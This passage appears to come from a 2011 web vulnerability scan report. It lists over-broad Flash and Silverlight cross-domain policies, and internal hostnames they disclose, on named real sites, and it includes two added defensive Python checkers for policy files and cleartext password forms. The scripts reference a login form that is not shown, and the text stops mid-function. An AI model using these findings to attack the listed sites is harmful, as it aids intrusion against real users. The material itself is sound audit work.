The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 09 Sep 2011 19:45:22 GMT
Date: Thu, 08 Sep 2011 19:45:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

3.21. http://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:2773"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:45:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

3.22. https://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: https://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:2b2b"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:46:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

3.23. http://us.rd.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.rd.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.rd.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.24. http://www.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Wed, 07 Sep 2011 20:18:10 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Thu, 08 Sep 2011 19:46:58 GMT
Age: 191
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

3.25. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.55.4.40
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.26. http://www.nasdaqtrader.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nasdaqtrader.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nasdaqtrader.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/xml
Content-Location: http://www.nasdaqtrader.com/crossdomain.xml
Last-Modified: Wed, 14 Oct 2009 18:11:02 GMT
Accept-Ranges: bytes
ETag: "e0afa2b0f94cca1:2e7f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:46:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.nasdaqtrader.com" secure="false" />
   <allow-access-from domain="*.nasdaqtrader.com" secure="true" />
<allow-access-from domain="*.nasdaqomxtrader.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nasdaqomxtrader.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.nasdaqworkstation.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nasdaqworkstation.com" secure="true" />
...[SNIP]...

3.27. http://www.thefinancials.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefinancials.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefinancials.com

Response

HTTP/1.1 200 OK
Content-Length: 632
Content-Type: text/xml
Last-Modified: Thu, 07 Jul 2011 21:14:58 GMT
Accept-Ranges: bytes
ETag: "c03d51edea3ccc1:790"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:25:08 GMT
Connection: close

<?xml version="1.0"?>    
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.com" />    
<allow-access-from domain="*.doubleclick.net" />    
<allow-access-from domain="*.dartmotif.com" />    
<allow-access-from domain="*.2mdn.net" />    
<allow-access-from domain="*.pureinvestment.net" />    
<allow-access-from domain="*.buzinessware.com" />    
<allow-access-from domain="*.nationalgoldgroup.com" />
<allow-access-from domain="*.rfdevsite.com" />
<allow-access-from domain="*.jpmorganglobal.com" />
...[SNIP]...

3.28. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Thu, 08 Sep 2011 19:46:53 GMT
Expires: Thu, 08 Sep 2011 19:46:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

3.29. https://account.optionsxpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: account.optionsxpress.com

Response

HTTP/1.1 200 OK
Content-Length: 771
Content-Type: text/xml
Last-Modified: Mon, 18 Jul 2011 16:07:35 GMT
Accept-Ranges: bytes
ETag: "15d87cf6445cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8C6E114D48C6D550A47B7E8C7FE7E0AE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optionsxpress.com"/>
   <allow-access-from domain="www.optionsxpress.com"/>
   <allow-access-from domain="oxint.optionsxpress.com"/>
...[SNIP]...
<allow-access-from domain="www.optionsxpress.ca"/>
   <allow-access-from domain="ox.design.optionsxpress.com"/>
   <allow-access-from domain="plr.design.optionsxpress.com"/>
   <allow-access-from domain="10.12.137.51"/>
   <allow-access-from domain="mouaweb1"/>
   <allow-access-from domain="mouabx1"/>
   <allow-access-from domain="mouawebau1"/>
   <allow-access-from domain="mouaint1"/>
...[SNIP]...

3.30. https://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 09 Sep 2011 11:34:32 GMT
Date: Thu, 08 Sep 2011 11:34:32 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 29546

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

3.31. http://pfgbest.app5.hubspot.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pfgbest.app5.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pfgbest.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:111fc"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 20:05:41 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

3.32. http://stats.manticoretechnology.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.manticoretechnology.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.manticoretechnology.com

Response

HTTP/1.1 200 OK
Content-Length: 266
Content-Type: text/xml
Last-Modified: Mon, 29 Sep 2008 15:46:03 GMT
Accept-Ranges: bytes
ETag: "8074787a4a22c91:651"
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:26:24 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="aetnafeds.jellyvision.com" />
<allow-access-from domain="staging.aetnafeds.jellyvision.com" />
<allow-access-from domain="sandbox.aetnafeds.jellyvision.com" />
...[SNIP]...

3.33. http://www.optionsxpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.optionsxpress.com

Response

HTTP/1.1 200 OK
Content-Length: 771
Content-Type: text/xml
Last-Modified: Mon, 18 Jul 2011 16:07:35 GMT
Accept-Ranges: bytes
ETag: "15d87cf6445cc1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=536F72C044CD5B46AABFEAA014EA70D3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optionsxpress.com"/>
   <al
...[SNIP]...
<allow-access-from domain="oxint.optionsxpress.com"/>
...[SNIP]...
<allow-access-from domain="www.optionsxpress.ca"/>
   <allow-access-from domain="ox.design.optionsxpress.com"/>
   <allow-access-from domain="plr.design.optionsxpress.com"/>
   <allow-access-from domain="10.12.137.51"/>
   <allow-access-from domain="mouaweb1"/>
   <allow-access-from domain="mouabx1"/>
   <allow-access-from domain="mouawebau1"/>
   <allow-access-from domain="mouaint1"/>
...[SNIP]...

4. Silverlight cross-domain policy
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
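The review step above, and the same review for the Flash policies in findings 3.22 to 3.33, can be scripted. The following checker is an added example written for this report; it is not Burp's code or any vendor's. It flags the patterns the findings above exhibit: a site-control of "all", wildcard domains, secure="false" on a host also served over HTTPS, internal hostnames or RFC 1918 addresses disclosed in a public policy (as in 3.29 and 3.33), and a Silverlight policy that admits every domain with arbitrary request headers (as in 4.1 and 4.2). The sample documents are constructed to mirror those shapes; hostnames such as partner.example and buildhost1 are invented.

```python
"""Audit Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
policies for over-broad trust.

Added example; not part of the original scan report or of any vendor's code.
The sample documents below are constructed; partner.example and buildhost1
are invented names, and 10.12.137.51 is an RFC 1918 address of the kind
seen in findings 3.29 and 3.33.
"""
import ipaddress
import xml.etree.ElementTree as ET


def _is_public_hostname(host: str) -> bool:
    """False for bare IP addresses and single-label names, neither of which
    belongs in a policy served to the Internet."""
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass
    return "." in host.lstrip("*.")


def audit_flash_policy(xml_text: str) -> list:
    """Return (severity, message) pairs for a crossdomain.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    site_control = root.find("site-control")
    if site_control is not None and site_control.get("permitted-cross-domain-policies") == "all":
        findings.append(("medium", "site-control permits policy files anywhere on the host, "
                                   "so any user-controlled upload path can widen this policy"))
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append(("high", 'domain="*": any site may read authenticated responses'))
        elif domain.startswith("*."):
            findings.append(("low", f"wildcard trusts every host under {domain[2:]}"))
        if el.get("secure", "true").lower() == "false":
            findings.append(("low", f'{domain}: secure="false" lets SWFs loaded over http:// '
                                    "reach this host over https://"))
        if domain != "*" and not _is_public_hostname(domain):
            findings.append(("info", f"{domain}: internal hostname or IP disclosed"))
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append(("medium", "any domain may send custom request headers"))
    return findings


def audit_silverlight_policy(xml_text: str) -> list:
    """Return (severity, message) pairs for a clientaccesspolicy.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        if allow is None:
            continue
        uris = [d.get("uri", "") for d in allow.iter("domain")]
        grant = policy.find("grant-to")
        paths = [r.get("path", "/") for r in grant.iter("resource")] if grant is not None else []
        if any(u in ("*", "http://*", "https://*") for u in uris):
            findings.append(("high", "any domain may call " + (", ".join(paths) or "(no resource listed)")))
        if allow.get("http-request-headers") == "*":
            findings.append(("medium", "callers may set arbitrary request headers"))
    return findings


# Constructed sample in the shape of findings 3.22, 3.29 and 3.33.
FLASH_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*.partner.example" secure="false"/>
  <allow-access-from domain="10.12.137.51"/>
  <allow-access-from domain="buildhost1"/>
</cross-domain-policy>
"""

# The same trust relationship expressed narrowly: one named host, master policy only.
FLASH_HARDENED = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.partner.example"/>
</cross-domain-policy>
"""

# Constructed sample in the shape of findings 4.1 and 4.2.
SILVERLIGHT_SAMPLE = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""

if __name__ == "__main__":
    for label, fn, doc in (("crossdomain.xml", audit_flash_policy, FLASH_SAMPLE),
                           ("crossdomain.xml (hardened)", audit_flash_policy, FLASH_HARDENED),
                           ("clientaccesspolicy.xml", audit_silverlight_policy, SILVERLIGHT_SAMPLE)):
        print(label)
        for sev, msg in fn(doc) or [("ok", "no issues found")]:
            print(f"  [{sev}] {msg}")
```

Run it against a policy fetched with a plain GET, as the scanner did. Note that secure="false" only matters on hosts that also answer over HTTPS, and that a bare IP or single-label name in the policy is a disclosure rather than a cross-domain weakness in itself; both are reported so the reviewer can decide.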


4.1. http://contentcafe2.btol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://contentcafe2.btol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contentcafe2.btol.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 15:44:32 GMT
Accept-Ranges: bytes
ETag: "3d984d4beb1dcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 20:00:16 GMT
Connection: close
Content-Length: 313

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*"/>
           </allow-from>
           <grant-to>
               <reso
...[SNIP]...

4.2. http://stats.optionsxpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.optionsxpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.optionsxpress.com

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:24:49 GMT
Server: Omniture DC/2.0.0
xserver: www399
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5. Cleartext submission of password
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
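The check behind findings 5.1 and 5.2 (a password field inside a form whose resolved action is an http:// URL) is straightforward to reproduce offline. The script below is an added example written for this report, not Burp's detection logic. It goes one step beyond the finding: a login page that is itself served over HTTP is flagged even when its form posts to HTTPS, because an on-path attacker can rewrite the action before the user types anything. The HTML fragments are constructed to mirror the eflogin.php form above and a hardened variant; login.example.test is an invented host.

```python
"""Find forms that submit a password over clear-text HTTP.

Added example; not part of the original scan report. The HTML samples are
constructed: LOGIN_HTTP mirrors the eflogin.php form in finding 5.1, and
LOGIN_HTTPS is an invented hardened variant on the invented host
login.example.test.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect each <form>'s action and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "passwords": [field names]}]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "passwords": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["passwords"].append(a.get("name") or a.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_url: str, html: str) -> list:
    """Return (resolved_action, password_fields, reason) for each risky form.

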